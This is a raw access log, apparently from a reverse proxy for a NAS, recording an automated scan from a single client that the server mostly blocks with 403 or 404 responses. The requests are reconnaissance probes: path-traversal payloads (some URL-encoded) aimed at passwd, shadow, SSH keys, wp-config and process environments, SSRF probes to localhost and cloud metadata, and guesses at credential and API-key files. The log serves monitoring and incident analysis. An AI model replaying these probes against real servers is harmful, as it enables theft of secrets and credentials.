nas.profibot.hu "/?inc=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/runtime.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/proton/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/media/server.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/tips/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/config/config.exs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/binance-keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/backend/auth" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/dialogflow_agent.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/wp-admin/customize.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/wp-json/oembed/1.0/embed" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/config/environment.rb" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/teleconsole.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/auth/context/init" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/ibmq/creds.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/169.254.169.254/latest/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/dump.sql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:23 +0000] - 404 404 - GET https nas.profibot.hu "/shopify/pwa-config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/braintree/merchant_config.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/unity/ProjectSettings/InputManager.asset" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/plans/quota_limits.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/oauth2/authorize" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/etc/domainkeys/domainkeys.private" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 403 403 - GET https nas.profibot.hu "/.travis.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/mail/certs/key.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/oauth2/tokeninfo" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/ws/connect?tokenA=abc&tokenB=xyz" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/wazuh/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/admin/tools/request" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/drupal/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/card_network/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 403 403 - GET https nas.profibot.hu "/.idea/workspace.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/config/wallet.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/neurofeedback/session.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/mec/deploy.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/oauth/token?client_id=xyz&client_secret=abc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/afterpay/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 403 403 - GET https nas.profibot.hu "/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:24 +0000] - 404 404 - GET https nas.profibot.hu "/inventory" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/auth.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 403 403 - GET https nas.profibot.hu "/scada/status.cgi" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/orders/history.db" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/ping?ip=127.0.0.1" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/processor/tokens.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/game/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/data/downlink/schedule.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/dashboard_admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/store/checkout_terminal.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/_panel/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/openai/credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/secure/tokenization.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/config/settings-desktop.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/admin/me" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/issuer/api_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/cache/headers.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/dvc.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/proc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/vector.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/car/config/settings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/payment/sepa/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:25 +0000] - 404 404 - GET https nas.profibot.hu "/gitlab-ci.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/tiller/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/braintree-keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/tmp/mailqueue/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/qiskit/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - - 403 - GET https nas.profibot.hu "/proxy?url=http://localhost" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - - 403 - GET https nas.profibot.hu "/?url=http://127.0.0.1" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/swagger-ui.html" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/uav/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/:8080" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/components/com_content/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/actuator/health" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/applepay/token_map.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/sonarqube/conf/sonar-project.properties" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cetc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/adminer/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/v1/graphql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/windows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/id_rsa.pub" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/format" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/etc/nginx/sites-available/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/hmi/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:26 +0000] - 404 404 - GET https nas.profibot.hu "/signing/pgp/secring.gpg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/elastic-agent.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/sidecar/config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/rspamd/local.d/milter_headers.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/portal/configuration.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/fog/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/minting/api/config.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/system/ping" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/nginx_status" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/swagger-ui/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/xero/api_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/transcoder/settings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/kfsensor/settings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/abis/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/redoc/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/runtime/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/ota/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/etc/httpd/conf/httpd.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/webhooks/outgoing/transaction.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/aws.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/backup/tmp/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/chargebacks/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:27 +0000] - 404 404 - GET https nas.profibot.hu "/kyc/corporate_rules.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/mlruns/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/controller/settings.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/mailcow.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/winrar/rarreg.key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5croot/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cproc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/ideal/payment_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/braintree.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/:7001" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/webapp/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 403 403 - GET https nas.profibot.hu "/.blitz/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/test/request" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/certs/csr.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/mobilepay/clicktopay_settings.yaml" [Client 185.177.72.49] [Length 8467] 